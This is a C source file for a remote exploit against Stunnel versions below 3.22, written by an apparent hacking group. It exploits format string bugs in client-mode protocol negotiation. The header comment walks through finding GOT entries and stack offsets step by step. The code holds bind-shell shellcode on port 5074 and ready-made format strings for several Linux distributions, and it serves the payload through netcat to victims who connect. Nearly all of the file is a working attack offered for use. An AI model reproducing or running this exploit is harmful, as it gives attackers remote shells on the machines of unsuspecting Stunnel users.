/*
* Stunnel < 3.22 remote exploit
* by ^sq/w00nf - deltha [at] analog.ro
* Contact: deltha@analog.ro
* Webpage: http://www.w00nf.org/^sq/
*
* ey ./w00nf-stunnel contribs - kewlthanx :
* nesectio, wsxz, soletario, spacewalker, robin, luckyboy, hash, nobody, ac1d, and not @ the end: bajkero
*
* You also need netcat and format strings build utility (from my webpage)
* Compile: gcc -w -o w00nf-stunnel w00nf-stunnel.c
*
* . . .. ......................................... ...
* . ____ ____ _____ :.:.:
* : _ __/ __ \/ __ \____ / __/ :..
* :.. | | /| / / / / / / / / __ \/ /_ :
* ..:.. | |/ |/ / /_/ / /_/ / / / / __/ :
* :.: :.. |__/|__/\____/\____/_/ /_/_/ .
* : : :..
* :.: :............................................... .. . .
* T . E . A . M
*
* POC - Tested remotely on linux
* Stunnel is a program that allows you to encrypt arbitrary TCP connections inside SSL
* Visit http://www.stunnel.org for details
*
* I didn't add a search function or bruteforce attack because the vulnerability does'nt allow you
* to grab the remote stack.
*
* Description of this exploit:
* This exploit puts a payload on a specified port. When a remote user connects to your machine
* using stunnel on the specified port, the exploit executes this payload and binds a shell to the
* remote users machine on port 5074.
*
* Summary:
* Malicious servers could potentially run code as the owner of an Stunnel process when using
* Stunnel's protocol negotiation feature in client mode.
*
* Description of vulnerability:
* Stunnel is an SSL wrapper able to act as an SSL client or server,
* enabling non-SSL aware applications and servers to utilize SSL encryption.
* In addition, Stunnel has the ability to perform as simple SSL encryption/decryption
* engine. Stunnel can negotiate SSL with several other protocols, such as
* SMTP's "STARTTLS" option, using the '-n protocolname' flag. Doing so
* requires that Stunnel watches the initial protocol handshake before
* beginning the SSL session.
* There are format string bugs in each of the smtp, pop, and nntp
* client negotiations as supplied with Stunnel versions 3.3 up to 3.21c.
*
* No exploit is currently known, but the bugs are most likely exploitable.
*
* Impact:
* If you use Stunnel with the '-n smtp', '-n pop', '-n nntp' options
* in client mode ('-c'), a malicous server could abuse the format
* string bug to run arbitrary code as the owner of the Stunnel
* process. The user that runs Stunnel depends on how you start
* Stunnel. It may or may not be root -- you will need to check
* how you invoke Stunnel to be sure.
* There is no vulnerability unless you are invoking Stunnel with
* the '-n smtp', '-n pop', or '-n nntp' options in client mode.
* There are no format string bugs in Stunnel when it is running as an SSL
* server.
*
* Mitigating factors:
* If you start Stunnel as root but have it change userid to some other
* user using the '-s username' option, the Stunnel process will be
* running as 'username' instead of root when this bug is triggered.
* If this is the case, the attacker can still trick your Stunnel process
* into running code as 'username', but not as root.
* Where possible, we suggest running Stunnel as a non-root user, either
* using the '-s' option or starting it as a non-privileged user.
*
* Triggering this vulnerability - example for kidz:
* Obtain a shell account on to-be-hacked's server and perform the following commands:
* sq@cal013102: whereis stunnel
* stunnel: /usr/sbin/stunnel
* change directory to where is stunnel
* Obtain vsnprintf's R_386_JUMP_SLOT:
* sq@cal013102:~/stunnel-3.20$ /usr/bin/objdump --dynamic-reloc ./stunnel |grep printf
* 08053470 R_386_JUMP_SLOT fprintf
* ---->080534a8 R_386_JUMP_SLOT vsnprintf
* 080535a4 R_386_JUMP_SLOT snprintf
* 08053620 R_386_JUMP_SLOT sprintf
* open 2 terminals
* in the first terminal make netcat connect to a port (eg 252525)
* sq@cal013102:~/stunnel-3.20$ nc -p 252525 -l
* in the second terminal (remote) simulate attack
* ./stunnel -c -n smtp -r localhost:252525
* in the first terminal with nc insert a specially crafted string to grep eatstack value
* AAAABBBB%x|%x|%x|%x|%x|%x|%x|%x|%x|%x|%x|%x|%x|%x|%x|%x|
* in the second terminal (remote) it will return the stack values and see at which position
* 41414141 and 424242 appeared
* AAAABBBB|bffff868|bffffb60|bffffece|bffffed3|80503ae|40275580|4016bfc4|
* 4027f3c4|41414141|42424242|257c7825|78257c78|7c78257c|
* 257c7825|78257c78|7c78257c| ->414141=9 and 424242=10
* try again with to see if eatstack value is 9 AAAABBBB%9$x%10$x and it will return AAAABBBB4141414142424242
* put the address obtained with objdump in hex little endian format \xa8\x34\x05\x08 and last value +2 \xaa\x34\x05\x08
* (a8+2=aa) and generate the decimal value of format string after you got the middle of nops value on stack 0xbffff89b
* with build, a program attached to this exploit.
* ./build 080534a8 0xbffff89b 9
* adr : 134558888 (80534a8)
* val : -1073743717 (bffff89b)
* valh: 49151 (bfff)
* vall: 63643 (f89b)
* [ки%.49143x%9$hn%.14492x%10$hn] (35)
* ки%.49143x%9$hn%.14492x%10$hn
* The resulting string is %.49143x%9$hn%.14492x%10$hn ->
* "'`%.32759u%9\$hn%.32197u%10\$hn replace eatstack 10 with 9 otherwise it won't work
* eg "'`%.32759u%10\$hn%.32197u%9\$hn
* Put the payload in a file echo `perl -e 'print "\xc4\x35\x05\x08\xc6\x35\x05\x08"'`%.32759u%10\$hn%.32197u%9\$hn > x
* Bind the payload to a port ./netcat -p 252525 -l <x
* Simulate the payload attack ./stunnel -c -n smtp -r localhost:252525
* Add your own crafted format in the exploit:
* char fmtDEBIAN30[]="\xa8\x34\x05\x08\xaa\x34\x05\x08%.49143x%10\$hn%.14492x%9\$hn"; 080534a8 vsnprintf
* char fmtYOUROWN[]=""; R_386_JUMP_SLOT vsnprintf
* Simulate the payload attack with this exploit ./w00nf-stunnel -t 6 -p 252525 t6 would be your custom payload
* after you added your string in the exploit.
* If stunnel was compiled with gdb support and you set ulimit -c 9024 or whatever to coredump on your terminal
* then stunnel will coredump if you didn't guess the exact stackvalue in the middle of nops.
* If stunnel wasn't compiled with gdb support then download it from the stunnel website
* and compile with gdb support.
* Once you have downloaded it run './configure edit Makefile' , and where you see 'CFLAGS' add '-g -ggdb3'
* eg. 'cat Makefile |grep CFLAGS'
* CFLAGS=-g -ggdb3 -O2 -Wall -I/usr/local/ssl/include -DVERSION=\"3.20\" -DHAVE_OPENSSL=1 -Dssldir=\"/usr/local/ssl\"
* -DPEM_DIR=\"\" -DRANDOM_FILE=\"/dev/urandom\" -DSSLLIB_CS=0 -DHOST=\"i586-pc-linux-gnu\" -DHAVE_LIBDL=1
* DHAVE_LIBPTHREAD=1 -DHAVE_LIBUTIL=1 -DHAVE_LIBWRAP=1 etcetc
* Open core in gdb sq@cal013102:~/stunnel-3.20$gdb ./stunnel core.2411
* x/10i $esp and press enter a couple of times till you find 'nop nop nop nop nop nop'.
* Get the stack address in the middle of nops, 0xbffff89b is my address
* and build (9 is eatstack) again with the ./build utility
* Rebuild and repeat.
* ./build 080534a8 0xbffff89b 9
* Put the payload in a file echo `perl -e 'print "\xc4\x35\x05\x08\xc6\x35\x05\x08"'`%.32759u%10\$hn%.32197u%9\$hn > x
* ./w00nf-stunnel -t 6 -p 252525 t6 is your custom payload and it will bind a shell on 5074 :)
* If it worked then add your own crafted format in the exploit
* char fmtDEBIAN30[]="\xa8\x34\x05\x08\xaa\x34\x05\x08%.49143x%10\$hn%.14492x%9\$hn"; 080534a8 vsnprintf
* char fmtYOUROWN[]="\xa8\x34\x05\x08\xaa\x34\x05\x08%.49143x%10\$hn%.14492x%9\$hn"; R_386_JUMP_SLOT vsnprintf
*
*/
#include <fcntl.h>
#include <netdb.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>
#include <getopt.h>
#include <stdlib.h>
#include <memory.h>
#include <errno.h>
#include <syslog.h>
int MAX;
char linuxshellcode[] =
/* <priv8security>: bind@5074 */
"\x90\x90\x90\x90\x90" /* nop */
"\x90\x90\x90\x90\x90" /* nop */
"\x90\x90\x90\x90\x90" /* nop */
"\x90\x90\x90\x90\x90" /* nop */
"\x90\x90\x90\x90\x90" /* nop */
"\x90\x90\x90\x90\x90" /* nop */
"\x90\x90\x90\x90\x90" /* nop */
"\x90\x90\x90\x90\x90" /* nop */
"\x90\x90\x90\x90\x90" /* nop */
"\x90\x90\x90\x90\x90" /* nop */
"\x90\x90\x90\x90\x90" /* nop */
"\x90\x90\x90\x90\x90" /* nop */
"\x90\x90\x90\x90\x90" /* nop */
"\x90\x90\x90\x90\x90" /* nop */
"\x90\x90\x90\x90\x90\x90" /* nop */
"\x31\xc0" /* xor %eax,%eax */
"\x50" /* push %eax */
"\x40" /* inc %eax */
"\x89\xc3" /* mov %eax,%ebx */
"\x50" /* push %eax */
"\x40" /* inc %eax */
"\x50" /* push %eax */
"\x89\xe1" /* mov %esp,%ecx */
"\xb0\x66" /* mov $0x66,%al */
"\xcd\x80" /* int $0x80 */
"\x31\xd2" /* xor %edx,%edx */
"\x52" /* push %edx */
"\x66\x68\x13\xd2" /* pushw $0xd213 */
"\x43" /* inc %ebx */
"\x66\x53" /* push %bx */
"\x89\xe1" /* mov %esp,%ecx */
"\x6a\x10" /* push $0x10 */
"\x51" /* push %ecx */
"\x50" /* push %eax */
"\x89\xe1" /* mov %esp,%ecx */
"\xb0\x66" /* mov $0x66,%al */
"\xcd\x80" /* int $0x80 */
"\x40" /* inc %eax */
"\x89\x44\x24\x04" /* mov %eax,0x4(%esp,1) */
"\x43" /* inc %ebx */
"\x43" /* inc %ebx */
"\xb0\x66" /* mov $0x66,%al */
"\xcd\x80" /* int $0x80 */
"\x83\xc4\x0c" /* add $0xc,%esp */
"\x52" /* push %edx */
"\x52" /* push %edx */
"\x43" /* inc %ebx */
"\xb0\x66" /* mov $0x66,%al */
"\xcd\x80" /* int $0x80 */
"\x93" /* xchg %eax,%ebx */
"\x89\xd1" /* mov %edx,%ecx */
"\xb0\x3f" /* mov $0x3f,%al */
"\xcd\x80" /* int $0x80 */
"\x41" /* inc %ecx */
"\x80\xf9\x03" /* cmp $0x3,%cl */
"\x75\xf6" /* jne 80a035d <priv8security+0x3d> */
"\x52" /* push %edx */
"\x68\x6e\x2f\x73\x68" /* push $0x68732f6e */
"\x68\x2f\x2f\x62\x69" /* push $0x69622f2f */
"\x89\xe3" /* mov %esp,%ebx */
"\x52" /* push %edx */
"\x53" /* push %ebx */
"\x89\xe1" /* mov %esp,%ecx */
"\xb0\x0b" /* mov $0xb,%al */
"\xcd\x80"; /* int $0x80 */
char fmtRH72[]="\x50\x71\x05\x08\x52\x71\x05\x08%.49143x%4\$hn%.12881x%3\$hn"; /* 08057150 R_386_JUMP_SLOT vsnprintf */
char fmtRH73[]="\xe8\x69\x05\x08\xea\x69\x05\x08%.49143x%4\$hn%.12982x%3\$hn"; /* 080569e8 R_386_JUMP_SLOT vsnprintf */
char fmtRH80[]="\x28\x69\x05\x08\x2a\x69\x05\x08%.49143x%4\$hn%.12815x%3\$hn"; /* 08056928 R_386_JUMP_SLOT vsprintf */
char fmtMDK90[]="\xf8\x23\x05\x08\xfa\x23\x05\x08%.49143x%4\$hn%.13321x%3\$hn"; /* 080523f8 R_386_JUMP_SLOT vsnprintf */
char fmtSLACK81[]="\xdc\x69\x05\x08\xde\x69\x05\x08%.49143x%10\$hn%.12082x%9\$hn"; /* 080569dc R_386_JUMP_SLOT vsnprintf */
char fmtDEBIAN30[]="\xa8\x34\x05\x08\xaa\x34\x05\x08%.49143x%10\$hn%.14492x%9\$hn"; /* 080534a8 R_386_JUMP_SLOT vsnprintf */
char fmtYOUROWN[]=""; /* R_386_JUMP_SLOT vsnprintf */
char c;
struct os {
int num;
char *ost;
char *shellcode;
char *format;
int flag;
};
struct os plat[] =
{
{
0,"Red Hat Linux release 7.2 stunnel-3.20.tar.gz",
linuxshellcode,fmtRH72,11
},
{
1,"Red Hat Linux release 7.3 stunnel-3.20.tar.gz",
linuxshellcode,fmtRH73,11
},
{
2,"Red Hat Linux release 8.0 stunnel-3.20.tar.gz",
linuxshellcode,fmtRH80,11
},
{
3,"Mandrake Linux release 9.0 stunnel-3.20.tar.gz",
linuxshellcode,fmtMDK90,11
},
{
4,"Slackware Linux release 8.1 stunnel-3.20.tar.gz",
linuxshellcode,fmtSLACK81,5
},
{
5,"Debian GNU release 3.0 stunnel-3.20.tar.bz2",
linuxshellcode,fmtDEBIAN30,5
},
{
6,"Your custom distro stunnel-3.20.tar.bz2",
linuxshellcode,fmtYOUROWN,5
}
};
void usage(char *argument);
int main(argc,argv)
int argc;
char *argv[];
{
int type=0;
int flag=plat[type].flag;
extern char *optarg;
int cnt;
char newstring[300];
int port = 994;
const char* sploitdata_filename = "sploitdata.spl";
static int fd[2];
static pid_t childpid;
static char str_port[6];
void write_sploit_data (char* entry)
{
int fd = open (sploitdata_filename, O_WRONLY | O_CREAT | O_APPEND, 0660);
write (fd, entry, strlen (entry));
write (fd, "\n", 1);
fsync (fd);
close (fd);
}
if(argc == 1)
usage(argv[0]);
if(argc == 2)
usage(argv[0]);
if(argc == 3)
usage(argv[0]);
while ((c = getopt(argc, argv, "h:p:t:v")) > 0 ){
switch (c) {
case 't':
type = atoi(optarg);
if(type>6) /* 0,1,2,3,4,5,6 */
{
(void)usage(argv[0]);
}
break;
case 'p':
port = atoi(optarg);
break;
case 'h':
usage(argv[0]);
case '?':
case ':':
exit(-1);
}
}
MAX=strlen(plat[type].format)+strlen(plat[type].shellcode);
fprintf(stdout,"Remote exploit for STUNNEL <3.22\nby ^sq/w00nf - deltha [at] analog.ro\n");
fprintf(stdout,"[*] target: %s\n",plat[type].ost);
fprintf(stdout,"[*] maxlenght: %d\n", MAX);
unlink (sploitdata_filename);
strcpy(newstring, plat[type].format);
strcat(newstring, plat[type].shellcode);
write_sploit_data(newstring);
sprintf((char *) &str_port, "%d", port);
printf("[*] host: localhost\n");
printf("[*] port: %s\n", str_port);
printf("[*] waiting: jackass should connect to our port\n");
printf("[*] next: after he connects press ctrl-c\n");
printf("[*] next: you should try to connect to his port 5074 - nc 1.2.3.4 5074\n");
pipe(fd);
if (( childpid=fork())==0) { /* cat is the child */
dup2(fd[1],STDOUT_FILENO);
close(fd[0]);
close(fd[1]);
execl("/bin/cat","cat",sploitdata_filename,NULL);
perror("The exec of cat failed");
} else { /* netcat is the parent */
dup2(fd[0], STDIN_FILENO);
close(fd[0]);
close(fd[1]);
execl("/usr/bin/nc", "nc", "-n", "-l", "-p", str_port, NULL);
perror("the exec of nc failed");
}
printf("[*] next: now you should try to connect to his port 5074\n");
exit(0);
}
void usage(char *argument)
{
fprintf(stdout,"Usage: %s -options arguments\n",argument);
fprintf(stdout,"Remote exploit for STUNNEL <3.22\n"
"by ^sq/w00nf - deltha [at] analog.ro\nUsage: %s [-p <port> -t <targettype>]\n"
"\t-p <port> - Local binded port where the remote stunnel connects\n"
"\t-t <target> - Target type number\n", argument);
fprintf(stdout,"\t-Target Type Number List-\n");
fprintf(stdout," {0} Red Hat Linux release 7.2 "
" stunnel-3.20.tar.gz\n");
fprintf(stdout," {1} Red Hat Linux release 7.3 "
" stunnel-3.20.tar.gz\n");
fprintf(stdout," {2} Red Hat Linux release 8.0 "
" stunnel-3.20.tar.gz\n");
fprintf(stdout," {3} Mandrake Linux release 9.0 "
" stunnel-3.20.tar.gz\n");
fprintf(stdout," {4} Slackware Linux release 8.1 "
" stunnel-3.20.tar.gz\n");
fprintf(stdout," {5} Debian GNU release 3.0 "
" stunnel-3.20.tar.gz\n");
fprintf(stdout," {6} Your custom distro "
" stunnel-3.20.tar.gz\n");
fprintf(stdout," Example1: %s -t 1 -p 252525\n",argument);
exit(0);
}